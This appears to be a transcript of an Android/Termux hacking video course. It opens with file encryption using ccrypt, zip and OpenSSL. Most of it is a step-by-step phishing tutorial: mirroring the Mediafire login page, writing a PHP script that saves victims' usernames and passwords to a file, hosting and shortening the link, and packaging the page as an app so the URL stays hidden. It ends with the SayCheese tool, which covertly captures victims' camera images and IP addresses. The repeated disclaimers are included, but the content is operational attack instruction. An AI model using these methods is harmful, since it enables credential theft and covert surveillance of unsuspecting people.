have written. So yeah, I am learning how to encrypt. So we'll use crypt. Okay, CCEN crypt to encrypt, and CCDEC crypt to decrypt. Okay, so CCEN crypt, that is CCEN crypt you can say, and the file name, that is text.txt. It is important to notice that an encryption, the original file, that is text.txt, is replaced by text.txt.cpt. You'll enter the encryption key, that is the password. Next, when you will ls, you will see that the original file text.txt is replaced with text.txt.cpt. Now we'll try to decrypt it. Now once you have sent it to your whomsoever you want to send it, now how he or she can decrypt it? For that we have a command ccde crypt and the .cpt file, that is text.txt.cpt. So it will ask you about the decryption key, same as you have used in encryption. Press enter, then do ls. You'll see text.txt file. So this is how we do encryption and decryption with the help of ccrypt. Just control C, control X, control C. Yeah. So now just cat text.txt, and you'll see the original text message inside it. I am learning how to encrypt. Thank you. Hello everyone, and welcome to this video lecture. Now in this video, we'll learn a next tool, that is zip. Now zip, it is one of the most famous archive format, and it is so famous that we generally call archive files as zip files in our day-to-day communication. It uses pkzip stream cipher algorithm. To know more about pkzip stream cipher algorithm, you may refer to our reading material. Now, let's first start by installing zip. For that, simply type apt install zip. As you can see, zip has been successfully installed. Now ls and present working directory, it is showing we are in home. So first let's go down to our internal storage, that is SD card. So cd/SD card, and when we'll do ls, we'll see list of various files and folders. So we'll use zip --password. This is to give the password for our zip, and then the password name. For example, I'm giving it as my password. So for encrypting, I mean for giving password to our zip file, we'll use zip --password and then password name. Thereafter, what will be our .zip file name? So it will be named as myencrypt.zip. So here my password is the password used to encrypt it. An archive is created with the name zzz.zip and with zipped files. So I am taking few various files from our SD card. So let's say example zpersis.apk, dnat.apk, yeah, sorry, dnat.txt. I'm taking these two files. Okay.
And let's take one more, that is test.apk. So as you can see, we have our zip minus minus password and my password. So here my password is the password used to encrypt it. Okay, a archive is created with the name zzz.zip, and inside it we have given our file name, that is zpersis.apk, the nat.txt and test.apk. These three files of folders will be zipped in zzz.zip, and the password is my password. So as you can see, once I have hit entered, I mean the zip file has been created. So once we'll do ls, we'll see. As you can see, zzz.zip file has been created. I mean archive has been created. So let's create a folder, and inside it we'll move the zzz.zip, and then we'll unzip it. Okay, we'll not unzip here only, so that it will be easy for us to understand how to unzip a archive. Okay, so let's make a folder named as z folder. We'll clear the screen. We'll cd, I mean we'll change directly to our new folder, that is z folder. Okay, or else we'll move zzz, it would be better. Okay, so move zzz.zip to z folder. Okay, so cd z folder will be inside a z folder, and inside it, if once we do ls, we have our zip file. I mean, okay, yes. Now we'll unzip it. As you can see, our present working directory is z folder. Now to unzip it, simply type unzip zzz.zip. Once you enter, you will see the archive zzz.zip and the password. So here my password is the password used to encrypt it. Okay, so we'll give the password, and once the password is entered correctly, you can see all the files. Once you do ls, you will see test.apk, the nat.txt, zpersis.apk. All the things are there inside our z folder. So this is how we use zip tool to archive. Okay, I mean we can use this folder to, we can use this tool to you so that we can send an archive file to any person, also with a protected, I'm like we can protect the archive file. So we can use password and give this archive file a name, and then we can send it to our friend or family or what, whomsoever you want to send it. Okay, so yeah, this is for this video lecture. So in the next video lecture, we'll learn a new tool, that is OpenSSL. Thank you so much. Hello everyone, and welcome to the class. Now in this video lecture, we'll learn a new tool, that is OpenSSL. OpenSSL is a command line cryptographic toolkit which can be used to encrypt message as well as files. So here in OpenSSL, we use AES-256 CBC algorithm. Now to know more about this algorithm and how it works, you can refer to our reading material. Now first, we'll install OpenSSL. For that, apt install OpenSSL. Now type OpenSSL ENC, that is encryption, and then AES 256 CBC, the algorithm which is I mean the algorithm to be used here, and then in, that is full path of file to be encrypted. Okay, so we'll give the path. Before that, let's ls and see the file which we want to encrypt. We want to encrypt text.txt. Let's first cat and text.txt. Let's see what's inside it. Yes, I am learning how to encrypt. This is the file we want to encrypt. Alright, so again we'll type the command open SSL enc, that is encryption, AES 256 CBC, the algorithm to be used. Then in, that is full path of file to be encrypted. So it's inside home. So $home / text.txt, and out, that is full path where it will be decrypted. So out, I'll give it an SD card, that is our internal storage. So SD card / text.txt. So simply in is the full path of the file to be encrypted, and out is the full path where it will be decrypted. Just a second. Okay. In termworks, it is pkg install openssl hyphen tool. I mean, this command apt install openssl. I mean, openssl is used in Kali Linux. So in termworks, we use pkg install openssl hyphen tool. So we'll simply install it once again. I mean, last time it was not installed. I mean, the tool which we want to install. Okay, so pkg install openssl hyphen tool. As you can see, the tool has started. I mean, it's installation. I mean, its download has started, and it will be install. I mean, it's 672 KB. Okay, so not a big file. So type yes, and it will start downloading and install the tool. Let's just wait for few seconds. Yeah, the process is done. So we'll follow the steps once again. It is same as we did earlier. So we'll just clear the screen and just check present working directory. It's home. All right. Once again, uh, we'll type the same command which we as we did earlier. So open SSL ENC, that is encryption, AES 256 CBC, that is the algorithm to be used. Then in, that is the full path of file to be encrypted. So $home / you can also copy the I mean the path, that is data.com.termux files home as well, as we did earlier. So yeah, simply $home will also do. So $home / text.txt, and out is the full path where it will be decrypted. So SD card text.txt. Now hit enter. It will ask about the password. I mean, for the encryption, it will ask the password. So we'll type and verify once again. So it's done. Now we'll change our current directory. So we'll do cd / SD card, and we'll see if our file is there or not. So we have given it name as text enc.txt. Okay, as an out. Okay, cd / SD card. We'll see our file once we do ls. Yes, just a second. Let me scroll up and down. At times, it seems to be lost. I mean, it's there. Just a second. We'll scroll once again. Text enc.txt. Yeah, it's there.
Uh, just a second, I'm scrolling once again. Okay, maybe somewhere. I mean, it should be at the end. Yeah. Yeah, it's there. Text enc.txt. Yeah, I found it. So finally, so yeah, uh, we'll now once we'll try to see what happens if we just cat the file cat text enc.txt. We can see salted. So as you can see, it is once we did the cat text enc.txt, it is coming up salted. So what is salt? In cryptography, a salt is a random data that is used as an additional input to a one-way function that hashes data, a password or a passphrase. Salts are used to safeguard passwords in storage. Historically, a password was stored in plain text on a system. But over the time, additional safeguards were developed to protect a user's password against being read from the system. So, a salt is one of those methods. So now, as we can see, it is salted, we cannot read it. For to read this to read this text enc.txt, we need to decrypt it. Okay, now to decrypt it, we'll simply use open SSL enc, then again same algorithm, that is AES 256 CBC. Okay, now this time we'll use -d to decrypt. Okay, now in is the file name or the folder you want to decrypt. So this time our file name is text enc.txt, and then out. I mean, once this file is decrypted, by which name you want to see it. So simply we'll give it text.txt. Okay, this is very important, greater than, and then the file name text.txt. Greater than is used to get the output, okay, while we are decrypting. Okay, so we'll give the password and hit enter. Once we'll do ls, we'll see text.txt. As you can see, we can cat and see the output. Yes, I'm learning how to encrypt. Perfect. Thank you so much. Hello everyone and welcome to the class. Now in this section, we're gonna learn what is phishing. First, we're gonna cover what is phishing and what are the various types of phishing. Thereafter, we'll try to mirror a website with the help of HTTrack. Once it is done, next we'll try with PHP, we'll try a local host with a port number, and thereafter we'll try to upload our data, files in some web hosting platform. So once we have updated or uploaded our files in some web hosting platform, from there we can just share the link to any victim. From attacker's point of view, we'll share that link to any victim, and once the victim try to log in from that URL which we have provided, we'll directly get the username and the password. Thereafter, to make our attack more undetectable, like he or she who is providing his or her details won't feel like this is something phishing kind of an attack. So we'll try to make that URL, the whatever web hosting platform we have used, we'll try to make it in an app with the help of app geyser. So once you send the app, there won't be any clue for the victim to understand like this is a fake app and there is some phishing technique behind it. So this is how an attacker tries to get the username and the password from the victim. So everything we're going to learn in this section. So first of all, most important thing, this in this section you'll come across lot of things, okay, so which is just for educational purpose. Whatever illegal activities if you try to do, please do not try any illegal activities, because I am not responsible for any illegal activities which you conduct. This is only for the educational purpose and making aware like what are the things going on, and you should not click any link or download any app without, I mean, if anybody is providing you an app or a link via email or by share it or anything, please do not click any link or download any kind of a app without from the Play Store. If the app is in Play Store, you are 99% 90 to 99% safe. But if the app is not in Play Store, so please do not download it from anywhere. So this is purely for educational purpose. Do not try to harm anybody, because I am not responsible for anything. Thank you so much. Stay tuned. Now the first question comes to our mind is, what is phishing? So phishing is the fraudulent attempt to obtain sensitive information such as usernames, passwords, and credit card details by letting one person trust you in the electronic communication. Typically, phishing is carried out by email spoofing or instant messaging. It often directs users to enter personal information at a fake website which matches the look and feel of the legitimate site. Phishing is an example of social engineering techniques being used to deceive users. Now, attempts to deal with phishing incidents include legislation, user training, public awareness, and technical security measures. The latter being due to phishing attacks frequently exploiting weaknesses in current web security. Now, the various phishing techniques. Spear phishing. Phishing attempts directed at specific individuals or companies is known as spear phishing. In contrast to bulk phishing, a spear phishing attackers often gather and use personal information about their target to increase their probability of success. Next technique is whaling. The term whaling refers to spear phishing attacks directed specifically at senior executives and other high profile targets. In these cases, the content will be crafted to target an upper manager and the person's role in the company. We have clone phishing, we have cat phishing, link manipulation, filter evasion, forgery, covert redirect. There are many kinds of technique, but these are some of the you know uh, common example of techniques like voice phishing. We have social engineering, and there are various other techniques. So let's come to the practical part in the next class. Thank you so much. Hello everyone and welcome to the class. Now there are various tools available in the GitHub. We have Black Eye, Social Fish, Hidden Eye, etc. There are various tools available in the GitHub for phishing. But we're gonna simply use httrack to mirror our website, and then we'll use PHP and web hosting techniques, I mean web hosting platform, to simply copy the httrack will help us to copy, I mean to mirror the website, and then we'll upload the files in the web hosting platform, and then easily we'll generate the link, and we'll get the username and password once the victim types the username and password. All right. So in Black Eye or Social Fish, you must have seen, I mean these tools are there in the GitHub. In these tools you can see there are only limited set of websites available like Facebook, Instagram, WhatsApp, or you can say uh, Pinterest. Okay, so there are very limited social media account available. So but if you want to mirror
any kind of website, whether it's a file sharing app, whether it's gaming or anything, you can simply do it. So this is a simple demonstration like how we can mirror any kind of a website. So here I am using Mediafire. I mean, I'll try to clone Mediafire. So basically, what is a Mediafire? Mediafire is a simple I mean, it's a very simple to use free service that lets you put all your photographs, documents, music, and videos in a single place. So you can access them anywhere, from anywhere with the help of your phone, tablet, or anything. So we'll simply try to mirror this website. Okay. So this is how it looks. We'll just go into login, and this is the login page of the Mediafire. So we have email address and password. So next, we're gonna copy this link, and first of all, we'll copy the Mediafire link, and then we will try to mirror this website with the help of httrack. So as you can see, I have opened my Google Play Store, and there httrack website copier. Next, I need to install this app. Once the app is installed, open it, give the allow permission. Next, just click next for the new project. Project name, project category. Give any project name and project category. Next, as you can see, it is asking us the web address. So we'll just copy the URL, that is media file login, and we'll paste the URL here. As you can see, site mirroring finished. Success. So once this is done, we'll go to our internal storage and check whether inside httrack our project name, that is we have given the name as the nat, and inside it we have Mediafire website, mirrored or not. So let's go to internal storage. So as you can see, I am inside internal storage, httrack, inside websites, inside the nat folder. We have www.mediafire.com folder created. So inside it we can see our website, that is Mediafire, has been successfully mirrored. Next, we need to modify the mirrored website. For that, we'll download a code editor app from the Play Store. Here I am installing code editor. You can try any of the editor app which you feel comfortable. For me, code editor is one of the most comfortable apps. So yeah, open the website, open the app, then new or open in internal storage, then we'll go to httrack, yeah, website the net, and index.html. Now in this, go to the search option, type action is equals to, wherever you'll find action, just go there, edit it. So we'll create our own .php file. So whatever is there inside the action, we'll just remove it and just give our php, our .php file name. Okay. So now we'll try to remove or edit all the things there after action is equals to. Yeah, so action is equals to inside double quotes. Just give it any name. So here I'm giving my file.php, which we're gonna create afterwards, or give my work.php, whatever you feel like. Okay, that's a file name. So again, search for action. As you can see, there is only hash, so we'll remove the hash and give my work.php. Next, again go to search and see if there is action. Yes, action. So again, we'll remove all the other things, and lastly we'll have action is equals to inside double quotes my work.php. Make sure you do it correctly, because one small mistake won't let your phishing website work. So yeah, my work.php. Again we'll search. Yeah, there is one more. So again we'll remove all the things. My work.php. Once again we'll see if there is any. Yes, there is one more. So there are, near about 4 5 action is equals to there. So you need to remove and make some changes inside this mirrored website, so that your PHP file which we're gonna create in the next video would work. Okay, so like next, okay, all the my action has been done. So I mean action has been done. Action equals to my work, my work, my work. All the PHP are now done. Hello everyone and welcome to the class. Now here we're gonna first change our directory to httrack, and inside there we'll find website, and there we have the net our project name. So inside that we have www.mediafire.com. So inside it, once we do ls, we'll find the index.html. There we'll try to run the php minus s start and the localhost and give our port number, and we'll check whether we are able to uh, you know start our server with our port number. Let's begin. So first cd sd card, that is our internal storage, and there httrack. There we have website, the net our project name. Now we have mediafire, so cd.mediafire.com. Now we have login, so cd login. We'll see index.html. So now we'll try to start the php. So php minus s localhost 4444 php kg install. Okay, first of all, we need to install the php. So pkg install php. So yes, and yeah, it will take some time depending on your internet speed.
because 63.9 MB is the file size. So yeah, near about 5-10 minutes it will take. So once the package is downloaded and installed, next we'll again do php minus s localhost, then colon and the port number. You can give any port number. Here I'm choosing 4444. So I'll just skip this downloading and the installation of this package. So yeah, as you can see, it has been installed. So php minus s localhost. Okay, so invalid address localhost, it will be php minus s localhost colon and then 4444. So there is a mistake in the command, so that's why it is showing invalid address localhost. So once your package has been successfully downloaded and installed in Termux, next you're gonna type php minus s. Make sure you are in the same directory, okay, inside your index.html. Otherwise, this php won't be working, because we want this website to work in a local host. So for that we need to be inside that index.html file. Yeah, so php minus s localhost colon 4444. So php minus s localhost colon 4444. As you can see, it has started. Now you can simply copy this URL, that is http localhost 4444, and type in your browser. So you'll see this website coming up. So yeah, as you can see, I've simply copied the URL, that is http localhost 4444, and I'll try this in my browser. So once I hit enter, I'm inside the login page. So yeah, with the help of PHP, we are successfully, you know, using this URL in port in localhost and with port number 4444. So next in next video we're gonna make the mywork.php, which we have edited. You remember we have edited in the index.html file. So now we'll just make uh, a file which is named as mywork.php in the next video, and see how we can, upload it in web hosting platform. So thank you so much. Hello everyone and welcome to the class. So now it's time to create our mywork.php file. So let's begin. First of all, we'll open a text editor. Here I am using Nano. So Nano mywork.php. Yeah. So we're gonna start our .php file. So just always go through the reading material which I have provided. So any doubt you can ask me anytime. So I'll be happy to help you, because you may face, because many I mean it is very much new for many of us who are learning, including me, this PHP. So even I faced many problem at first. So if you face any kind of a problem while writing this script, or you can say a code for this mywork.php, then feel free to ask me. Okay, so this header is used to redirect the browser to the link. Okay, so therefore we are giving header and the location and the URL, which will help us to redirect the browser to the link. So this is the page where we want to redirect, that is mediafire.com login. All right, next we need to save the data, right?
whatever the victim gonna write, like username or password, we need to save it somewhere, right? So for that, we'll first use a variable. So here variable starts with a dollar. So dollar is used for indicating that it's a variable. So dollar and the variable name. So here I am giving work. You can give any variable name. Okay, next we'll write f open, that is to open the file. Next we need to provide two things. First, the file name, and other is the permission. So the file name which I am providing is password.txt. So whatever the username and the password the victim gonna type, it gonna save in password.txt. Next, we're gonna give the permission. That is, we have three kind of permission: read, write, or append. So here we want to write, so type w. Next, we'll use for each loop. We'll take two variables a and b. Then we'll use fwrite for writing in file. So most importantly, we are using the post, not the get method. Okay, so this post, the difference between this post and get is there in the reading material, please do check. Okay, so I'm using two variables, $a and $b. So here in this example, the $a would be the username. Okay, so whatever the username there, there are, you can say $a and $b. $a is equals or greater than $b, which means in $a, whatever the fields are like username, password, it will be coming in $a, and the $b will be the input field. Say if I type admin as username, okay, so $b will be admin. Once again, I'll try to make it very easy for us, even for me to understand. So next I have till $work open password, f open password.txt, and write mode is clear for us, right? Next we have used for each loop. We'll take two variables a and b. Okay, next, then we'll use fwrite for writing in the file. That's why I've written fwrite, and inside it, now which file to open. Okay, so earlier I have used the variable as work, so I'll open $work, and inside it $a. So here we want to write, so $a. In this example, $a would be username. Alright, in Mediafire you have seen we have two fields, like we have username and the password. So $a would be the username, and in $b here, which is the input field. Remember, $b here is the input field. So in front of the username, the victim will write his username or the email ID. So that email ID or the username will come in $b. Okay. So say for example, in username I type admin. So in $b, admin will come. Yeah. Now this for each loop will continue until all the input fields in the form in our website is finished. For example, in our Mediafire, we have two inputs, right? We have username and password. So it will run for two times in this example. So $a would be the username, and $b would be the username, the username which the victim has provided. So for example, once again I'm explaining it so that it's very much clear for us. So $a is the username, and $b would be the input field. Okay, so $b in input field, whatever the user has written. Say for example I have written admin, so $b, in $b admin will come. Once again the loop will run for the second input field. The second input field is password. So again, the $A will become password and $B will become the input field, the password which the victim enters. Okay, so this for each loop will run for 2 times because there are two input field, username and password. Once this loop is done, it will come out of this loop. I mean, once this input field is done, it will come out of this loop. And next, we're gonna close this. Alright, F open, we're gonna F close. Also, yes, make sure you write equals to as well, because we're gonna check the output, right? So $A equals to $B. So username equals to, that is the username which the victims provides, and $A, that is the password next, and the password which the victim provide. All right, next we'll close it. So F dot close, I mean not dot, F close, and $work. Now if you face any problem, like as a beginner, even I have faced a lot of problems, so you can just go to the reading materials. I have shared many links as well, so it would be very easy for us to understand. Now we'll save it. Once, let's just do the cat. So cat mywork.php and see whether our code is perfect or not. Yes, for each loop, f right, $, yeah, okay, I think it's perfectly fine. So next, we're gonna go, first we'll check the working directory. Yes, let's go inside login, I mean the web, inside our media fire. So from where we gonna start that PHP. Alright, so let's do ls first and check what are the files available now. Yeah, so we have index.html and mywork.php. So let's start the PHP server. So php -s localhost 4444. Now we'll simply copy this link, that is http localhost 4444, open our web browser and paste it there. Next, if everything works fine, we would be able to get the Mediafire website, and there we'll get the login and the password. So once we'll try to enter the login and the password from the victim's perspective, a password, right now you can see index.html and mywork.php. Once the victim writes the provides the username and the password and hit enter, that is login, we'll get one more file, that is password.txt, which we have created in our mywork.php. Alright, so let's copy it. Let's copy this URL and try this in the web browser. So here I am inside my web browser, just little bit, yeah. So I've omitted the link and we are inside localhost 4444, and yeah, we can see the Mediafire website has been opened. So let's try to provide any email address, any random you can put, so aaa@gmail.com, and thereafter provide the password, again any random password, and try to log in. So once you hit login, you won't be able to log in. So simply once you are back in Termux, you can see mywork.php is running. Control C to come out of this. Control C. Yeah. So just clear. You can see the password.txt clearly visible. So just clear the screen. Then ls password.txt. So yes. So just cat password.txt. You will see the login and the password. The username and the password there. Yes, in email
We have provided aaa@gmail.com, and in login you can see abxd. I mean, sorry, in the password you can see abxd. So yeah, we are successfully getting the email and the password which our victim, you know, tried in our link. But this is just the local host, so this is only inside my device. This is not publicly available. So to make it publicly available, we'll try to upload this, I mean this index.html and mywork.php file to our web hosting platform. So in the coming of videos, we're gonna learn how we can upload it and create our own app. So once again, after every video, I'm trying to, you know, I'm trying to share you the knowledge and making you aware about the current situation, how frauds are happening. So please do not do any illegal activities. This is just for education purpose. So if you do any illegal activities with it, so I am not responsible for any illegal activities you are doing. So please make sure this is only for educational purpose and making you aware, like what are the links, what are the apps available which you may get from various sources. So do not click in any link or download any app. Thank you so much. Stay safe. Hello everyone and welcome to the class. So today we're going to learn how we can upload our files to a web hosting platform. So we are using triple web host. So sorry, triple zero web host. Yeah, so triple zero web host provides us a free hosting that comes with an impressive set of features like an easy to use website builder. It supports WordPress with zero ads on your site. Okay, so it is kind of a free web hosting platform, so we can try this. So let's begin. Simply click on the free web hosting triple zero webhost.com and go to the free sign up. Enter your email and password. I am using any random email and password. So this is not my email ID. Okay, so I got this from temporary email because I'm not using any my personal Gmail account. So you can also use temporary email accounts, or you can use your own. That's not a big problem. Okay, so first you need to verify. One email will be there inside your email ID, so you need to verify it. So once you are verified, so triple zero web host will be easily accessible. So once you are inside, you'll see many options available. So simply you're gonna type select others, give website name. uh, I'm giving media world 123 or simply media world. You can give any project name. So if it is available for you, you will see it is available, or else you need to change the name. So yeah, give any password. So as you can see, okay, another website with the same name already exists, so I need to change my uh, project name. So media world 123. I guess there is no media world 123. Yeah, successfully built. So next we need to upload your site, or just change it to desktop site. It would be more easy for you. At times you may, logged out from this, so just simply log in once again. So once you are logged in, you'll see this kind of an interface. So your website is there. Simply simply click the manage website, then upload. So now you're gonna see file manager. So we have public underscore HTML and TMT. So inside public, so yeah, inside public underscore HTML we have htaccess. So we just need to delete it. We don't need this file. Just press and delete. Next, we need to upload our index.html and my word. I mean, what's that PHP we made? Just forgetting the name. My work.php. Yeah. So you can see I'm inside my mediafire.com. So yeah, index.html is updated. Next is my work.php. Similarly, in the same folder, select files, upload my work.php. So now both the files are uploaded in public underscore html. So we'll come back 2 times. Once again, we'll check, we'll refresh this page. Yeah, we have, once again we'll refresh it, and then again we'll go to file manager, or upload we can say, and just verify it whether inside our public html we have index.html and mywork.php. Yes, we have. So next, back and again back, 2 times back, we'll see our website media123. We'll just need to copy that file, I mean copy that URL, or simply we can click that URL. We can see we have our media file working perfectly. So if this link we copy and send it to some of our victim, and if he or she tries to log in, as we can see, like abcdefgh@gmail.com, and providing any password, now this link is publicly available to everybody. You can send this to any victim, and once he or she tries to log in, we can just simply go to our website inside our file manager or upload. Now we'll see passport.txt file generated. Open public underscore html, and yeah, you can see password.txt is generated. So try to open it, and as you can see, login email is abcdefgh@gmail.com, and login password is 123456789, what the victim has entered. So now this link is publicly available, right? So anybody who clicks this link and tries to access it, his username and password is to, I mean his username and password is with the attacker now. So make sure also, you can see the link, it is coming at the end like 000webhost.com. So you can also use short to, or you can just shorten the link URL, so that the victim gets confused, and I mean your link should not be suspicious, like, if he or she feels like there is something inside it, so he or she won't be clicking. So what the attacker do, they change the link, I mean they shorten up the link, they change they I mean they purely shorten up the link and they send it to the victim. So make sure you do not click in any random links coming up to your email, to your WhatsApp, or anywhere. This is just purely for educational purpose. Once again, I am saying this. I've been telling this for a long time because I don't want anybody to do any illegal activities. This is only for educational purpose and making people aware, because many frauds are happening nowadays. So make sure you are secure. I mean, you do not share your password with anybody just by clicking this link. So this is simply how you can make uh, mirror of any website. So we tried with Mediafire. You can also get some link of Facebook login, even Instagram login, or similar way like the way we tried to copy Mediafire. Similar way we can copy Facebook, Instagram, Pinterest, Twitter, anything, LinkedIn. Also you can also get some bank login password. So make sure you do not click any link which is coming in your SMS or anywhere. Do not, until and unless it is a valid, you just check the URL if it is valid. Like if it is coming from Facebook, so it should be like https facebook.com, not https or http bitly or 000webhost.com or something else. Make sure you check the URL 100 times, not 100 times, just I mean just with your all eyes and your all eyes open, just try to check whether it's a phishing URL coming or it's a legit Facebook, Instagram, or any bank link coming. So this is how a phishing page works. Any kind of a website can be mirrored with httrack, and this kind of a phishing page can be done. Next, how attacker makes it more undetectable is like by creating an app. So in next video we'll see how we can create the app for this URL. Thank you so much. Hello everyone and welcome to the class. Now we are in the last step of our phishing section where we're gonna create an app with the help of AppsGeezer. So basically what is AppsGeezer? AppsGeezer is free app creator that allows converting any web content into an Android app in 2 easy steps. It is built to help people to transfer their ideas into apps. So who uses AppsGeezer? AppsGeezer, app creator is made for everyone who is interested in app development. AppsGeezer allows you to establish new marketing channel for communication and attracting new users for your business with mobile software. Share your knowledge and interesting content with the whole world. So this is what AppsGeezer is all about. Rest you can read it through the reading material. Okay, so let's dive into our practical section. Simply in your web browser type AppsGeezer, first link AppsGeezer. Okay, then next we need to log in. You can log in with your email ID, or you can just use a temporary email ID. So once you have successfully logged in, you will see create your first app. So simply hit create an app. You can also make it a desktop site, so it would be more interesting and more easy for you. So yeah, create app to earn, create app to grow, whatever you want to whatever you want to try. So I'll try create an app to grow. So simply business website, there are many options available, so we'll follow the simple step. Next we need to give the website URL. So this website URL is the URL which you got from 000webhost.com. You remember that URL? Yes, you need to copy and paste it. So if you do not remember from which URL to paste here, just go to 000webhost.com. Inside there, once you logged in, there you will see your website available, and there at the bottom of your website there is a link. So just copy that link and paste it in this website URL. So simply paste the URL and you'll see, make sure your URL is workable. Okay, so it is working. Now next you need to give app name. So media 123, a media world 123. Let's see if we can get this. Yeah, next there is icon option. You have default icon or custom icon. Simply you can type custom icon and select any one image or icon you want to upload. I have selected social media and click next. So you can just check the app settings. Yes, perfectly working. Next app name and lastly icon. Then you click the create option. It will take little, some time, and yeah, welcome to the dashboard. It will navigate to your dashboard. Just skip the tour. You can see media world 123.
there are some, you know, monetization and some ads are there, so just skip the tour. So signing up the APK almost done. Once it's 100%, that just click it, press OK and next. As you can see, my app has successfully downloaded. It's 13.84 MB, that is Media World 123. So I'll try to install it. Do you want to install this application? Install. The APK file is not more than 13 or 14 MB. Make sure, yeah, once your app is installed, open it. Make sure it, once you are sending it, just see the interface. It's perfectly looking like an app. No, nobody can, judge like this is not a real app or it's a phishing app. So simply you can just type in your username or email ID like ffffggff@gmail.com, and next provide the password, anything. All right, nobody can, just say this is a fake app or a phishing app by looking at it, because there is no URL as such to, judge whether it is a fake or real. So next you need to just go into your 000webhost.com. Inside there, just simply log in and check your website. It will take some time to load. At times it takes a lot of time to load, and at times this 000webhost.com, you'll see that 502 bad gateway or its website is crashed. So yeah, at times it creates some problem as well. So yeah, once you're inside the file manager, that public HTML, inside it, open, you will see the password.txt. Open that. So as you can see, we have the email ffggff perfectly there, also the password, the hhddd, whatever we have, typed there. So this is how you can just convert your uh, your website into a website or any kind of a link into an app with the help of apps geyser. And your victim won't be able to understand like whether it's a fake or real phishing app or not. So make sure you always download from the play store. That's why we always say do not, install anything from any other link or somebody sending you email to just I made a like many times I received an email like, hey, I just created this game, you just need to download it and give a review. So once you download and install it, you will see there is nothing, like there is no login or password. But I mean, you it will ask you to, just simply provide your login or password. So once you login, you will able to play the game, but in the back end your login and the password has been with the attacker. So make sure you just do not, install anything from email ID or something like that. Always prefer Play Store, because it is one of the safest place from where you can download any uh, app. So make sure, once again I'll be telling you, just make sure you do not misuse this, because it is totally for education purpose and making people aware like this thing are going on, these frauds are going on. So make sure you're not uh, getting, cheated by anybody, or your username or login are getting out, I mean, with the hackers. So make sure you do not, misuse this, whatever I have, you know whatever I have taught you in this section. Just make sure this is only for the educational purpose, and help your friends, help your family just to stay aware and stay safe. Thank you so much. Hello everyone and welcome to the class. Now in this video lecture we'll learn a tool named as Say Cheese. So what is a Say Cheese? Say Cheese is a tool that generates a malicious HTTPS page using ngrok port forwarding method and a JavaScript code to perform CAM request using media devices.get user media. So once a link is created with the help of ngrok, that is port forwarding, so after this port forwarding, a link will be generated, and if you send this link to the victim, once he or she allows, to access his or her camera, so within few seconds, repeatedly you will get, you know, images from the front camera of the victim's device, and he or she won't be knowing that his or her images has been clicked and sent back to the attacker. So this the media device.get user media method prompts the user for permission to use a media input which produces a media stream which tracks containing the request type of media. That stream can include, for example, a video track produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth. An audio track, similarly produced by physical or virtual audio source like microphone or similar products, and possibly other tracks. So, legal disclaimer: usage of say cheese for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all the applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. So make sure you do not use it for any illegal activities. This is just for knowledge purpose. All right. So let's begin. Hello everyone and welcome to this class. So this is the GitHub page for this say cheese. So how it works, legal disclaimer, and the installation procedure is given. So we'll quickly jump to Termux, and we'll download and install this say cheese tool in Termux. So yeah, once again you can go through this legal disclaimer that usage of say cheese for attacking targets without prior mutual consent is illegal. Alright, so first git clone, and we'll just copy this git clone command and open a termux. First of all, we'll update and upgrade our termux because it is very important. Apt update and apt upgrade -y, it will automatically update and upgrade all the necessary files and folders and packages required. So just wait for a few seconds. Yeah, it is updated. Next, we'll clear the screen and paste our GitHub repository. The command which we have copied. So it has started cloning the say cheese. So we'll do cd and say cheese. We'll change the directory to say cheese. Next, we'll do ls. We have saycheese.sh and saycheese.html and various other files. So we'll type the command bash saycheese.sh. Just clear the screen and make sure your data connection and hotspot is on, because this time will be this say cheese will be downloading ngrok inside its folder, and this ngrok does not supports Wi-Fi. So you need to make sure like your data, mobile data and hotspot is on, so that your ngrok can create the link, the port forwarding link. All right, so simply type bash saycheese.sh, then choose an option, press 1 for mirror website. Yeah, make sure your hotspot is on and press enter. See the starting, it has started the PHP server localhost 3333. Make sure you choose the one first option, that is mirror website, and hit enter. So yeah, as you can see, after the server started in localhost 3333, the ngrok server has also started and an https link has been shared. So you simply need to copy this http link. So the attacker copies this https link and send it to the victim. Once the victim opens this url inside his her device, so there will be an allow option. If he or she presses the allow option, then it will get the permission, or you can say this say cheese tool will get the access of his or her camera and will generate images. Also, they will get the ip location of the victim. Just simply copy the link, and from the attacker's point of view, he or she just copy the link and send it to the victim. As you can see, I am opening this link in my own Android device just for educational purpose. So I don't want to, and I mean I don't want anybody else to open this link. So simply it will come in my, as soon as I open copy the link and open it in my web browser, I'll see a snap camera something coming up. It will just ask me, first I accept the cookie, and then a pop-up will be there. Just wait for few seconds, you'll see it. At times it takes few seconds. Yes, the IP you can see. Yeah, that's the IP of my own device. I have, as you can see, I have it asked me about allow or block. I have given the access by pressing allow, and as you can see, once I'll be back in the termux, there will be the IP address and few images which will be clicked from my front camera. As you can see, as soon as I came back to my termux, two cam file received and it has been saved in images. So two image has been clicked as soon as I have allowed. So with the interval of 10 or 15 seconds, two images have been clicked and it is inside my image folder, saved in image folder. So simply we can just change our directory to image and check whether the images are, I mean the original images are there or not. So simply we'll do control C, ls, uh, we can see inside the images, yeah, cd images, ls. Yes, we can see, oh, they have taken three images. So just copy this, since we are in the home directory. So simply we'll just copy this image and shift it to our internal storage. So copy images forward slash sd card forward slash any folder name you wanna give, say cheese, and the folder name images, or simply just copy the image and give the destination, I mean destination location. What's happening? No such file or folder. Just a second. It's inside home directory. So okay, okay, first we'll copy it. Yeah, perfect. So first we'll copy this to our home, and from home we'll see just ls. You can see yes, images are there. So now we can easily move because there is some problem. I don't know what's happening there. So cp, uh, we can use our, as it's a folder, so copy it to SD card. Since the copy is done, we'll just open our internal storage. As you can see, the three images which Say Cheese has taken from my device, from my front camera, as soon as I've allowed it. So it has taken three images, and it is perfectly there inside the device. So once again, a special warning: do not click any kind of a link. I know you are getting, frustrated or getting bored, I mean, by listening the same thing, but it's a very important thing to understand, because once you click such links, I mean, the attacker will get the access, many access. He or she will get most of the access of your phone. So make sure, I'm making you aware again and again, please do not click any kind of a link, or do not download any app other than the Google Play Store. Alright, so if you are using Android device specifically, so make sure you are aware of it. This is only for the educational purpose. Do not do any illegal activities. I am trying to show you how the attackers perform their attacks, and this is totally, you know you cannot, you should not, it is only for the educational purpose, and you should not try this with anybody and harm anybody. Okay, so please stay aware and stay safe from this all kind of fraud which is happening. Thank you so much. Hello everyone and welcome to the class. Now lastly, I'll show you how you can remove the packages of Sechis, because at times it is not easy because there is some write permissions there. So this is a short video clip how you can remove Sechis from your termux. So simply if you type pwd, you'll see 